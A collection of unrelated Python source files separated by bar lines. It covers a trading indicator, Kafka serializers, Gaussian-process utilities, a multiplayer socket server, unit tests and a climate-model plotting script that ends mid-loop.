gangannoise = torch.Tensor(np.linspace(-2, 2, 32)).cuda().view(-1, 1)
params = torch.load(gangandir+'model_249.pt')
gangan = SimpleGAN(113745, zdim=1, hd=8, hg=64, lr=2e-4).cuda()
gangan.load_state_dict(params)
gangan = gangan.cuda()
gan = gangan.sample(gangannoise)
img = visGANGAN(gan, gannoise, show=False)
ax.imshow(img)
#plt.show()
fig.savefig('gangan_sample', dpi=200, bbox_inches='tight')
|
# -*- coding: utf-8 -*-
from pandas import DataFrame, Series
from pandas_ta.overlap import ema
from pandas_ta.utils import get_offset, non_zero_range, verify_series
def stc(close, tclength=None, fast=None, slow=None, factor=None, offset=None, **kwargs):
"""Indicator: Schaff Trend Cycle (STC)"""
# Validate arguments
tclength = int(tclength) if tclength and tclength > 0 else 10
fast = int(fast) if fast and fast > 0 else 12
slow = int(slow) if slow and slow > 0 else 26
factor = float(factor) if factor and factor > 0 else 0.5
if slow < fast: # mandatory condition, but might be confusing
fast, slow = slow, fast
_length = max(tclength, fast, slow)
close = verify_series(close, _length)
offset = get_offset(offset)
if close is None: return
    # kwargs allows three more series (ma1, ma2 and osc) to be passed in:
    # ma1 and ma2 replace the internal ema calculations, while osc substitutes
    # for both ma's.
ma1 = kwargs.pop("ma1", False)
ma2 = kwargs.pop("ma2", False)
osc = kwargs.pop("osc", False)
# 3 different modes of calculation..
if isinstance(ma1, Series) and isinstance(ma2, Series) and not osc:
ma1 = verify_series(ma1, _length)
ma2 = verify_series(ma2, _length)
if ma1 is None or ma2 is None: return
        # Calculate result based on externally fed series
xmacd = ma1 - ma2
# invoke shared calculation
pff, pf = schaff_tc(close, xmacd, tclength, factor)
elif isinstance(osc, Series):
osc = verify_series(osc, _length)
if osc is None: return
        # Calculate result based on the externally fed oscillator
        # (it should range around the 0 x-axis)
xmacd = osc
# invoke shared calculation
pff, pf = schaff_tc(close, xmacd, tclength, factor)
else:
        # Calculate result .. (traditional/full)
# MACD line
fastma = ema(close, length=fast)
slowma = ema(close, length=slow)
xmacd = fastma - slowma
# invoke shared calculation
pff, pf = schaff_tc(close, xmacd, tclength, factor)
# Resulting Series
stc = Series(pff, index=close.index)
macd = Series(xmacd, index=close.index)
stoch = Series(pf, index=close.index)
# Offset
if offset != 0:
stc = stc.shift(offset)
macd = macd.shift(offset)
stoch = stoch.shift(offset)
# Handle fills
if "fillna" in kwargs:
stc.fillna(kwargs["fillna"], inplace=True)
macd.fillna(kwargs["fillna"], inplace=True)
stoch.fillna(kwargs["fillna"], inplace=True)
if "fill_method" in kwargs:
stc.fillna(method=kwargs["fill_method"], inplace=True)
macd.fillna(method=kwargs["fill_method"], inplace=True)
stoch.fillna(method=kwargs["fill_method"], inplace=True)
# Name and Categorize it
_props = f"_{tclength}_{fast}_{slow}_{factor}"
stc.name = f"STC{_props}"
macd.name = f"STCmacd{_props}"
stoch.name = f"STCstoch{_props}"
    stc.category = macd.category = stoch.category = "momentum"
# Prepare DataFrame to return
data = {stc.name: stc, macd.name: macd, stoch.name: stoch}
df = DataFrame(data)
df.name = f"STC{_props}"
df.category = stc.category
return df
stc.__doc__ = \
"""Schaff Trend Cycle (STC)
The Schaff Trend Cycle is an evolution of the popular MACD, incorporating two
cascaded stochastic calculations with additional smoothing.
The STC also returns the initial MACD result as well as the result after the
first stochastic including its smoothing. This implementation has been extended
for Pandas TA to also allow separately feeding any other two moving averages
(as ma1 and ma2), or to skip this and instead feed an oscillator (osc) on which
the Schaff Trend Cycle should be calculated.
Feeding external moving averages:
The internal calculation..
    stc = ta.stc(close=df["close"], tclength=stc_tclen, fast=ma1_interval, slow=ma2_interval, factor=stc_factor)
becomes..
    extMa1 = df.ta.zlma(close=df["close"], length=ma1_interval, append=True)
    extMa2 = df.ta.ema(close=df["close"], length=ma2_interval, append=True)
    stc = ta.stc(close=df["close"], tclength=stc_tclen, ma1=extMa1, ma2=extMa2, factor=stc_factor)
The same goes for osc=, which allows the input of an externally calculated oscillator, overriding ma1 & ma2.
Sources:
Implemented by rengel8 based on work found here:
https://www.prorealcode.com/prorealtime-indicators/schaff-trend-cycle2/
Calculation:
    STCmacd = Moving Average Convergence/Divergence or Oscillator
    STCstoch = Intermediate Stochastic of MACD/Osc.
    A 2nd stochastic, including filtering, results in the
    STC = Schaff Trend Cycle
Args:
close (pd.Series): Series of 'close's, used for indexing Series, mandatory
    tclength (int): SchaffTC Signal-Line length. Default: 10 (adjust to half of the cycle)
fast (int): The short period. Default: 12
slow (int): The long period. Default: 26
factor (float): smoothing factor for last stoch. calculation. Default: 0.5
offset (int): How many periods to offset the result. Default: 0
Kwargs:
    ma1: 1st moving average provided externally (mandatory in conjunction with ma2)
    ma2: 2nd moving average provided externally (mandatory in conjunction with ma1)
    osc: an externally fed oscillator
fillna (value, optional): pd.DataFrame.fillna(value)
fill_method (value, optional): Type of fill method
Returns:
pd.DataFrame: stc, macd, stoch
"""
def schaff_tc(close, xmacd, tclength, factor):
    # Actual calculation part, which is shared between the operation modes
    # 1st: Stochastic of MACD
    lowest_xmacd = xmacd.rolling(tclength).min()  # min value in interval tclength
xmacd_range = non_zero_range(xmacd.rolling(tclength).max(), lowest_xmacd)
m = len(xmacd)
# %Fast K of MACD
stoch1, pf = list(xmacd), list(xmacd)
stoch1[0], pf[0] = 0, 0
for i in range(1, m):
if lowest_xmacd[i] > 0:
stoch1[i] = 100 * ((xmacd[i] - lowest_xmacd[i]) / xmacd_range[i])
else:
stoch1[i] = stoch1[i - 1]
# Smoothed Calculation for % Fast D of MACD
pf[i] = round(pf[i - 1] + (factor * (stoch1[i] - pf[i - 1])), 8)
pf = Series(pf, index=close.index)
# 2nd : Stochastic of smoothed Percent Fast D, 'PF', above
lowest_pf = pf.rolling(tclength).min()
pf_range = non_zero_range(pf.rolling(tclength).max(), lowest_pf)
# % of Fast K of PF
stoch2, pff = list(xmacd), list(xmacd)
stoch2[0], pff[0] = 0, 0
for i in range(1, m):
if pf_range[i] > 0:
stoch2[i] = 100 * ((pf[i] - lowest_pf[i]) / pf_range[i])
else:
stoch2[i] = stoch2[i - 1]
# Smoothed Calculation for % Fast D of PF
pff[i] = round(pff[i - 1] + (factor * (stoch2[i] - pff[i - 1])), 8)
return [pff, pf]
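# A minimal usage sketch (illustrative only, synthetic data): the three calling
# modes described in the docstring above -- fully internal calculation,
# externally supplied moving averages (ma1/ma2), and an externally supplied
# oscillator (osc). Guarded by __main__ so importing this module is unaffected.
if __name__ == "__main__":
    import numpy as np
    close = Series(100 + np.cumsum(np.random.randn(300)))
    # 1) traditional/full mode: the MACD line is built from internal EMAs
    df_full = stc(close, tclength=10, fast=12, slow=26, factor=0.5)
    # 2) externally supplied moving averages
    ext_ma1, ext_ma2 = ema(close, length=12), ema(close, length=26)
    df_ext = stc(close, tclength=10, ma1=ext_ma1, ma2=ext_ma2, factor=0.5)
    # 3) externally supplied oscillator (should range around the zero axis)
    df_osc = stc(close, tclength=10, osc=ext_ma1 - ext_ma2, factor=0.5)
    print(df_full.tail())
    print(df_ext.columns.tolist(), df_osc.columns.tolist())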
|
from django.contrib import admin
from . models import Message
# Register your models here.
admin.site.register(Message)
|
###############################################################
# Autogenerated module. Please don't modify. #
# Edit according file in protocol_generator/templates instead #
###############################################################
from typing import Dict
from ...structs.api.alter_replica_log_dirs_request import AlterReplicaLogDirsRequestData, LogDir, Topic
from ._main_serializers import ArraySerializer, ClassSerializer, Schema, int32Serializer, stringSerializer
topicSchemas: Dict[int, Schema] = {
0: [("topic", stringSerializer), ("partitions", ArraySerializer(int32Serializer))],
1: [("topic", stringSerializer), ("partitions", ArraySerializer(int32Serializer))],
}
topicSerializers: Dict[int, ClassSerializer[Topic]] = {
version: ClassSerializer(Topic, schema) for version, schema in topicSchemas.items()
}
topicSerializers[-1] = topicSerializers[1]
logDirSchemas: Dict[int, Schema] = {
0: [("log_dir", stringSerializer), ("topics", ArraySerializer(topicSerializers[0]))],
1: [("log_dir", stringSerializer), ("topics", ArraySerializer(topicSerializers[1]))],
}
logDirSerializers: Dict[int, ClassSerializer[LogDir]] = {
version: ClassSerializer(LogDir, schema) for version, schema in logDirSchemas.items()
}
logDirSerializers[-1] = logDirSerializers[1]
alterReplicaLogDirsRequestDataSchemas: Dict[int, Schema] = {
0: [("log_dirs", ArraySerializer(logDirSerializers[0]))],
1: [("log_dirs", ArraySerializer(logDirSerializers[1]))],
}
alterReplicaLogDirsRequestDataSerializers: Dict[int, ClassSerializer[AlterReplicaLogDirsRequestData]] = {
version: ClassSerializer(AlterReplicaLogDirsRequestData, schema)
for version, schema in alterReplicaLogDirsRequestDataSchemas.items()
}
alterReplicaLogDirsRequestDataSerializers[-1] = alterReplicaLogDirsRequestDataSerializers[1]
|
from .base import APIException
class ActivationFinishedException(APIException):
message = "ACTIVATION_ALREADY_FINISHED"
description = "number activation has already been completed"
def __init__(self, response):
super(ActivationFinishedException, self).__init__(description=self.description)
class ActivationNotExist(APIException):
message = "NO_ACTIVATION"
description = "this activation was not found"
def __init__(self, response):
super(ActivationNotExist, self).__init__(description=self.description)
|
# Copyright James Hensman and Max Zwiessele 2014, 2015
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from . import linalg
from .config import config
try:
from GPy_0_8_8.util import choleskies_cython
config.set('cython', 'working', 'True')
except ImportError:
config.set('cython', 'working', 'False')
def safe_root(N):
i = np.sqrt(N)
j = int(i)
if i != j:
raise ValueError("N is not square!")
return j
def _flat_to_triang_pure(flat_mat):
N, D = flat_mat.shape
M = (-1 + safe_root(8*N+1))//2
ret = np.zeros((D, M, M))
for d in range(D):
count = 0
for m in range(M):
for mm in range(m+1):
ret[d,m, mm] = flat_mat[count, d];
count = count+1
return ret
def _flat_to_triang_cython(flat_mat):
N, D = flat_mat.shape
M = (-1 + safe_root(8*N+1))//2
return choleskies_cython.flat_to_triang(flat_mat, M)
def _triang_to_flat_pure(L):
D, _, M = L.shape
N = M*(M+1)//2
flat = np.empty((N, D))
for d in range(D):
count = 0;
for m in range(M):
for mm in range(m+1):
flat[count,d] = L[d, m, mm]
count = count +1
return flat
def _triang_to_flat_cython(L):
return choleskies_cython.triang_to_flat(L)
def _backprop_gradient_pure(dL, L):
"""
Given the derivative of an objective fn with respect to the cholesky L,
compute the derivate with respect to the original matrix K, defined as
K = LL^T
where L was obtained by Cholesky decomposition
"""
dL_dK = np.tril(dL).copy()
N = L.shape[0]
for k in range(N - 1, -1, -1):
for j in range(k + 1, N):
for i in range(j, N):
dL_dK[i, k] -= dL_dK[i, j] * L[j, k]
dL_dK[j, k] -= dL_dK[i, j] * L[i, k]
for j in range(k + 1, N):
dL_dK[j, k] /= L[k, k]
dL_dK[k, k] -= L[j, k] * dL_dK[j, k]
dL_dK[k, k] /= (2 * L[k, k])
return dL_dK
def triang_to_cov(L):
return np.dstack([np.dot(L[:,:,i], L[:,:,i].T) for i in range(L.shape[-1])])
def multiple_dpotri(Ls):
return np.array([linalg.dpotri(np.asfortranarray(Ls[i]), lower=1)[0] for i in range(Ls.shape[0])])
def indexes_to_fix_for_low_rank(rank, size):
"""
    Work out which indexes of the flattened array should be fixed if we want
    the cholesky to represent a low rank matrix
    """
    # first we'll work out what to keep, and then do the set difference.
    # here are the indexes of the first column, which are the triangular numbers
    n = np.arange(size)
    triangulars = (n**2 + n) // 2
    keep = []
    for i in range(rank):
        keep.append(triangulars[i:] + i)
    # add the diagonal
    keep.append(triangulars[1:] - 1)
    keep.append((size**2 + size)//2 - 1)  # the very last element
    keep = np.hstack(keep)
    return np.setdiff1d(np.arange((size**2 + size)//2), keep)
if config.getboolean('cython', 'working'):
triang_to_flat = _triang_to_flat_cython
flat_to_triang = _flat_to_triang_cython
backprop_gradient = choleskies_cython.backprop_gradient_par_c
else:
backprop_gradient = _backprop_gradient_pure
triang_to_flat = _triang_to_flat_pure
flat_to_triang = _flat_to_triang_pure
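# A minimal sketch (illustrative only): round-trip between the flat and
# triangular representations used above. For M = 3 each matrix is stored as
# N = M*(M+1)/2 = 6 flat entries; D is the number of stacked matrices.
if __name__ == '__main__':
    D, M = 2, 3
    N = M * (M + 1) // 2
    flat = np.arange(1.0, N * D + 1).reshape(N, D)
    L = flat_to_triang(flat)       # shape (D, M, M), lower triangular
    back = triang_to_flat(L)       # inverse mapping, shape (N, D)
    assert np.allclose(back, flat)
    print('round trip OK, L has shape %s' % (L.shape,))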
|
import miniproxypool
import logging
import sys
import time
import requests
logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='[%(name)20.20s] [%(asctime)s] [%(levelname)7.7s] [%(threadName)10s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S',)
logging.getLogger('requests').setLevel(logging.WARNING) # suppress the logger from requests
logger = logging.getLogger(__name__)
if __name__ == '__main__':
miniproxypool.config.VALIDATOR_URL = "http://www.google.ca"
miniproxypool.config.VALIDATOR_TIMEOUT = 0.5 # seconds
miniproxypool.config.VALIDATOR_THREAD_POOL_SIZE = 20
miniproxypool.config.VALIDATOR_CONNECTIONS_PER_THREAD = 20
miniproxypool.config.VALIDATE_THREAD_RUN_PERIOD = 5 * 60 # seconds wait after each validation
miniproxypool.config.LOAD_PORXIES_FROM_RESOURCES_THREAD_RUN_PERIOD = 10 * 60 # seconds wait after each loading from sites
miniproxypool.run_as_daemon()
while(True):
print("There are %d valid proxies in the pool."%len(miniproxypool.get_all_proxies()))
time.sleep(60 * 10)
#print(miniproxypool.get_all_proxies())
|
from rpg.items.consumables import Consumable
class Food(Consumable):
config_filename = "consumables/food.yaml"
|
# server code for people to play on
import socket, threading
from queue import Queue
# sockets server framework based on a framework from Rohan Varma and Kyle Chin
HOST = ""
PORT = 50003
BACKLOG = 4
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen(BACKLOG)
print("waiting for connection...")
def handleClient(client, serverChannel, cID, clientele):
client.setblocking(1)
msg = ""
while True:
try:
msg += client.recv(10).decode("UTF-8")
command = msg.split("\n")
while (len(command) > 1):
readyMsg = command[0]
msg = "\n".join(command[1:])
serverChannel.put(str(cID) + " " + readyMsg)
command = msg.split("\n")
except:
clientele.pop(cID)
return
def serverThread(clientele, serverChannel):
while True:
msg = serverChannel.get(True, None)
print("msg recv: ", msg)
msgList = msg.split(" ")
senderID = msgList[0]
instruction = msgList[1]
details = " ".join(msgList[2:])
if details != "":
for cID in clientele:
if cID != senderID:
sendMsg = senderID + " " + instruction + " " + details + "\n"
clientele[cID].send(sendMsg.encode())
print("> send to %s:" % cID, sendMsg[:-1])
        print("senderID: " + senderID,
              "instruction: " + instruction,
              "details: " + details)
print()
serverChannel.task_done()
clientele = dict()
playerNum = 0
# instructions to be executed
serverChannel = Queue(100)
threading.Thread(target = serverThread, args = (clientele, serverChannel)).start()
names = ["Player1", "Player2", "Player3", "Player4"]
while True:
client, address = server.accept()
    # myID is the client's key in the clientele dictionary
myID = names[playerNum]
print(myID, playerNum)
for cID in clientele:
print(repr(cID), repr(playerNum))
clientele[cID].send(("newPlayer %s\n" % myID).encode())
client.send(("newPlayer %s\n" % cID).encode())
clientele[myID] = client
client.send(("myIDis %s \n" % myID).encode())
    print("connection received from %s" % myID)
threading.Thread(target = handleClient,
args = (client, serverChannel, myID, clientele)).start()
playerNum += 1
|
import random
from base import BaseMatcher
class VolunteerMatcher(BaseMatcher):
all_text = "volunteer someone"
all_text_other = "volunteer someone else"
dev_text = "volunteer a dev"
dev_text_other = "volunteer another dev"
dev_candidates = ['sjl', 'arthurdebert', 'honza', 'fernandotakai', 'nicksergeant']
all_candidates = dev_candidates + ['cz', 'ehazlett']
def choose(self, message, user):
victim = None
if self.dev_text_other in message.lower():
while (not victim) or victim == user:
victim = random.choice(self.dev_candidates)
return victim
if self.dev_text in message.lower():
return random.choice(self.dev_candidates)
if self.all_text_other in message.lower():
while (not victim) or victim == user:
victim = random.choice(self.all_candidates)
return victim
if self.all_text in message.lower():
return random.choice(self.all_candidates)
def respond(self, message, user=None):
victim = self.choose(message, user)
if victim:
self.speak('%s is it' % victim)
|
testinfra_hosts = ['clients']
def test_correct_package_versions_are_installed(host):
v = host.ansible.get_variables()
indy_cli = host.package('indy-cli')
assert indy_cli.is_installed
assert indy_cli.version == v['indy_cli_ver']
libindy = host.package('libindy')
assert libindy.is_installed
if v['indy_cli_libindy_ver'] is not None:
assert libindy.version == v['indy_cli_libindy_ver']
def test_indy_cli_is_available_in_path(host):
assert host.exists('indy-cli')
|
#!/usr/bin/env python
import readingapi
import argparse
# Argument parser
parser = argparse.ArgumentParser(description='Summarize reading list data.')
parser.add_argument('command', choices=['list', 'summary'], help='Action to perform.')
parser.add_argument('-g', '--graph', action="store_true", help='Produces a graph for each year.')
parser.add_argument('-y', '--year', help='A year or comma-separated list of years')
args = parser.parse_args()
# list, summary
if args.command == "list":
pass
elif args.command == "summary":
pass
|
import numpy as np
from sklearn.metrics import adjusted_rand_score as sklearn_ari
from clustermatch.sklearn.metrics import (
adjusted_rand_index,
get_contingency_matrix,
get_pair_confusion_matrix,
)
def test_get_contingency_matrix_k0_equal_k1():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([0, 1, 0, 2, 1, 2])
expected_mat = np.array([[1, 1, 0], [1, 0, 1], [0, 1, 1]])
observed_mat = get_contingency_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_contingency_matrix_k0_greater_k1():
part0 = np.array([0, 0, 1, 1, 2, 2, 3, 3, 3])
part1 = np.array([0, 1, 0, 2, 1, 2, 2, 2, 2])
expected_mat = np.array([[1, 1, 0], [1, 0, 1], [0, 1, 1], [0, 0, 3]])
observed_mat = get_contingency_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_contingency_matrix_k0_lesser_k1():
part0 = np.array([0, 0, 1, 1, 2, 2, 3, 3, 3, 2, 2, 2, 1])
part1 = np.array([0, 1, 0, 2, 1, 2, 3, 3, 3, 4, 4, 5, 5])
expected_mat = np.array(
[[1, 1, 0, 0, 0, 0], [1, 0, 1, 0, 0, 1], [0, 1, 1, 0, 2, 1], [0, 0, 0, 3, 0, 0]]
)
observed_mat = get_contingency_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_pair_confusion_matrix_k0_equal_k1():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([0, 1, 0, 2, 1, 2])
expected_mat = np.array([[18, 6], [6, 0]])
observed_mat = get_pair_confusion_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_get_pair_confusion_matrix_k0_greater_k1():
part0 = np.array([0, 0, 1, 1, 2, 2, 3, 3, 3])
part1 = np.array([0, 1, 0, 2, 1, 2, 2, 2, 2])
expected_mat = np.array([[42, 18], [6, 6]])
observed_mat = get_pair_confusion_matrix(part0, part1)
np.testing.assert_array_equal(observed_mat, expected_mat)
def test_adjusted_rand_index_manual_random_partitions_same_k():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([0, 1, 0, 2, 1, 2])
expected_ari = -0.25
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
def test_adjusted_rand_index_manual_perfect_match():
part0 = np.array([0, 0, 1, 1, 2, 2])
part1 = np.array([2, 2, 3, 3, 4, 4])
expected_ari = 1.0
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
def test_adjusted_rand_index_random_partitions_same_k():
maxk0 = 2
maxk1 = maxk0
n = 100
part0 = np.random.randint(0, maxk0 + 1, n)
part1 = np.random.randint(0, maxk1 + 1, n)
# warning: the sklearn's ari implementation can overflow in older versions
# when n is large
expected_ari = sklearn_ari(part0, part1)
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
def test_adjusted_rand_index_random_partitions_k0_greater_k1():
maxk0 = 5
maxk1 = 3
n = 100
part0 = np.random.randint(0, maxk0 + 1, n)
part1 = np.random.randint(0, maxk1 + 1, n)
# warning: the sklearn's ari implementation can overflow in older versions
# when n is large
expected_ari = sklearn_ari(part0, part1)
observed_ari = adjusted_rand_index(part0, part1)
observed_ari_symm = adjusted_rand_index(part1, part0)
assert observed_ari == observed_ari_symm
assert expected_ari == observed_ari
|
"""
Constants.
Constants for feeds and feed entries.
"""
ATTR_ALERT = "alert"
ATTR_ATTRIBUTION = "attribution"
ATTR_CATEGORY = "category"
ATTR_DESCRIPTION = "description"
ATTR_ID = "id"
ATTR_GUID = "guid"
ATTR_MAG = "mag"
ATTR_PLACE = "place"
ATTR_PUB_DATE = "pubDate"
ATTR_STATUS = "status"
ATTR_TIME = "time"
ATTR_TITLE = "title"
ATTR_TYPE = "type"
ATTR_UPDATED = "updated"
FILTER_CATEGORIES = "categories"
FILTER_MINIMUM_MAGNITUDE = "minimum_magnitude"
FILTER_RADIUS = "radius"
HTTP_ACCEPT_ENCODING_HEADER = {"Accept-Encoding": "deflate, gzip"}
|
#!/usr/bin/python
import json
from ansible.module_utils.basic import AnsibleModule
def main():
fields = {
"project": {"required": True, "type": "str"},
"repository": {"required": True, "type": "str"},
"image_id": {"required": True, "type": "str"},
"state": {
"default": "present",
"choices": ["present", "absent"],
"type": "str",
},
}
module = AnsibleModule(argument_spec=fields)
module.exit_json(changed=True, meta=json.dumps(module.params))
if __name__ == "__main__":
main()
|
'''
Main entry
'''
from __future__ import absolute_import
import argparse
from py_template.modules.manager import Manager
def menu():
'''
The Menu is here
'''
parser = argparse.ArgumentParser(
description='py_template')
parser.add_argument('-o',
action="store",
dest="output",
help='location to put README.md')
parser.add_argument('-p',
action="store",
dest="path",
help='base path to scan files')
parser.add_argument('-e',
action="store_true",
dest="execute",
default=False,
help='execute the values')
parser.add_argument('-x',
action="store_true",
dest="example",
default=False,
help='Only output info with examples')
parser.add_argument('--version',
action='version',
version='%(prog)s 1.0')
return parser.parse_args()
def main():
'''
This is used in the cli and from a couple places
'''
options = menu()
if options.execute:
m1 = Manager(options)
if __name__ == '__main__':
main()
|
"""
Plot comparisons between SIT and SIC modeling experiments using
WACCM4. Subplot includes FIT, HIT, FICT. Composites are
organized by QBO-E - QBO-W
Notes
-----
Author : Zachary Labe
Date : 31 January 2018
"""
### Import modules
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
import nclcmaps as ncm
import datetime
import read_MonthlyOutput as MO
import calc_Utilities as UT
import cmocean
### Define directories
directorydata = '/surtsey/zlabe/simu/'
directoryfigure = '/home/zlabe/Desktop/'
#directoryfigure = '/home/zlabe/Documents/Research/SITperturb/Figures/'
### Define time
now = datetime.datetime.now()
currentmn = str(now.month)
currentdy = str(now.day)
currentyr = str(now.year)
currenttime = currentmn + '_' + currentdy + '_' + currentyr
titletime = currentmn + '/' + currentdy + '/' + currentyr
print('\n' '----Plotting QBO comparisons - %s----' % titletime)
### Allot time series
year1 = 1900
year2 = 2000
years = np.arange(year1,year2+1,1)
### Call arguments
varnames = ['Z500','Z30','SLP','T2M','U10','U300','SWE','THICK','P','EGR']
runnames = [r'HIT',r'FIT',r'FICT']
experiments = [r'\textbf{FIT--HIT}',r'\textbf{FICT--HIT}']
qbophase = ['pos','non','neg']
period = 'DJF'
for v in range(len(varnames)):
    ### Call function for surface temperature data from each run
lat,lon,time,lev,tashit = MO.readExperi(directorydata,
'%s' % varnames[v],'HIT','surface')
lat,lon,time,lev,tasfit = MO.readExperi(directorydata,
'%s' % varnames[v],'FIT','surface')
lat,lon,time,lev,tasfict = MO.readExperi(directorydata,
'%s' % varnames[v],'FICT','surface')
### Create 2d array of latitude and longitude
lon2,lat2 = np.meshgrid(lon,lat)
### Read in QBO phases
filenamefitp = directorydata + 'FIT/monthly/QBO_%s_FIT.txt' % qbophase[0]
filenamefitno = directorydata + 'FIT/monthly/QBO_%s_FIT.txt' % qbophase[1]
filenamefitn = directorydata + 'FIT/monthly/QBO_%s_FIT.txt' % qbophase[2]
pos_fit = np.genfromtxt(filenamefitp,unpack=True,usecols=[0],dtype='int')
non_fit = np.genfromtxt(filenamefitno,unpack=True,usecols=[0],dtype='int')
neg_fit = np.genfromtxt(filenamefitn,unpack=True,usecols=[0],dtype='int')
filenamehitp = directorydata + 'HIT/monthly/QBO_%s_HIT.txt' % qbophase[0]
filenamehitno = directorydata + 'HIT/monthly/QBO_%s_HIT.txt' % qbophase[1]
filenamehitn = directorydata + 'HIT/monthly/QBO_%s_HIT.txt' % qbophase[2]
pos_hit = np.genfromtxt(filenamehitp,unpack=True,usecols=[0],dtype='int')
non_hit = np.genfromtxt(filenamehitno,unpack=True,usecols=[0],dtype='int')
neg_hit = np.genfromtxt(filenamehitn,unpack=True,usecols=[0],dtype='int')
filenamefictp = directorydata + 'FICT/monthly/QBO_%s_FICT.txt' % qbophase[0]
filenamefictno = directorydata + 'FICT/monthly/QBO_%s_FICT.txt' % qbophase[1]
filenamefictn = directorydata + 'FICT/monthly/QBO_%s_FICT.txt' % qbophase[2]
pos_fict = np.genfromtxt(filenamefictp,unpack=True,usecols=[0],dtype='int')
non_fict = np.genfromtxt(filenamefictno,unpack=True,usecols=[0],dtype='int')
neg_fict = np.genfromtxt(filenamefictn,unpack=True,usecols=[0],dtype='int')
    ### Concatenate runs
runs = [tashit,tasfit,tasfict]
### Separate per periods (ON,DJ,FM)
if period == 'ON':
tas_mo = np.empty((3,tashit.shape[0],tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i] = np.nanmean(runs[i][:,9:11,:,:],axis=1)
elif period == 'DJ':
tas_mo = np.empty((3,tashit.shape[0]-1,tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i],tas_mo[i] = UT.calcDecJan(runs[i],runs[i],lat,
lon,'surface',1)
elif period == 'FM':
tas_mo= np.empty((3,tashit.shape[0],tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i] = np.nanmean(runs[i][:,1:3,:,:],axis=1)
elif period == 'DJF':
tas_mo= np.empty((3,tashit.shape[0]-1,tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i],tas_mo[i] = UT.calcDecJanFeb(runs[i],runs[i],lat,
lon,'surface',1)
elif period == 'M':
tas_mo= np.empty((3,tashit.shape[0],tashit.shape[2],tashit.shape[3]))
for i in range(len(runs)):
tas_mo[i] = runs[i][:,2,:,:]
else:
        raise ValueError('Wrong period selected! (ON, DJ, FM, DJF, M)')
### Composite by QBO phase
tas_mofitpos = tas_mo[1][pos_fit,:,:]
tas_mohitpos = tas_mo[0][pos_hit,:,:]
tas_mofictpos = tas_mo[2][pos_fict,:,:]
tas_mofitnon = tas_mo[1][non_fit,:,:]
tas_mohitnon = tas_mo[0][non_hit,:,:]
tas_mofictnon = tas_mo[2][non_fict,:,:]
tas_mofitneg = tas_mo[1][neg_fit,:,:]
tas_mohitneg = tas_mo[0][neg_hit,:,:]
tas_mofictneg = tas_mo[2][neg_fict,:,:]
### Compute climatology
climofitpos = np.nanmean(tas_mofitpos,axis=0)
climohitpos = np.nanmean(tas_mohitpos,axis=0)
climofictpos = np.nanmean(tas_mofictpos,axis=0)
climofitnon = np.nanmean(tas_mofitnon,axis=0)
climohitnon = np.nanmean(tas_mohitnon,axis=0)
climofictnon = np.nanmean(tas_mofictnon,axis=0)
climofitneg = np.nanmean(tas_mofitneg,axis=0)
climohitneg = np.nanmean(tas_mohitneg,axis=0)
climofictneg = np.nanmean(tas_mofictneg,axis=0)
climo = [climohitpos,climohitnon,climohitneg,
climohitpos,climohitnon,climohitneg]
    ### Compute comparisons for months - taking the ensemble average
fithit = np.nanmean((tas_mofitneg-tas_mohitneg) - (tas_mofitpos[:32]-tas_mohitpos[:32]),axis=0)
ficthit = np.nanmean((tas_mofictneg-tas_mohitneg) - (tas_mofictpos[:32]-tas_mohitpos[:32]),axis=0)
diffruns_mo = [fithit,ficthit]
    ### Calculate significance for the selected period
stat_FITHIT,pvalue_FITHIT = UT.calc_indttest(tas_mofitneg-tas_mohitneg,tas_mofitpos[:32]-tas_mohitpos[:32])
stat_FICTHIT,pvalue_FICTHIT = UT.calc_indttest(tas_mofictneg-tas_mohitneg,tas_mofictpos[:32]-tas_mohitpos[:32])
pruns_mo = [pvalue_FITHIT,pvalue_FICTHIT]
###########################################################################
###########################################################################
###########################################################################
### Plot variable data for QBO composites
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
### Set limits for contours and colorbars
if varnames[v] == 'T2M':
limit = np.arange(-10,10.1,0.5)
barlim = np.arange(-10,11,5)
elif varnames[v] == 'Z500':
limit = np.arange(-60,60.1,1)
barlim = np.arange(-60,61,30)
elif varnames[v] == 'Z30':
limit = np.arange(-100,100.1,5)
barlim = np.arange(-100,101,50)
elif varnames[v] == 'SLP':
limit = np.arange(-6,6.1,0.5)
barlim = np.arange(-6,7,3)
elif varnames[v] == 'U10' or varnames[v] == 'U300':
limit = np.arange(-10,10.1,1)
barlim = np.arange(-10,11,5)
elif varnames[v] == 'SWE':
limit = np.arange(-25,25.1,1)
barlim = np.arange(-25,26,25)
elif varnames[v] == 'P':
limit = np.arange(-2,2.1,0.05)
barlim = np.arange(-2,3,1)
elif varnames[v] == 'THICK':
limit = np.arange(-60,60.1,3)
barlim = np.arange(-60,61,30)
elif varnames[v] == 'EGR':
limit = np.arange(-0.2,0.21,0.02)
barlim = np.arange(-0.2,0.3,0.2)
fig = plt.figure()
for i in range(len(diffruns_mo)):
var = diffruns_mo[i]
pvar = pruns_mo[i]
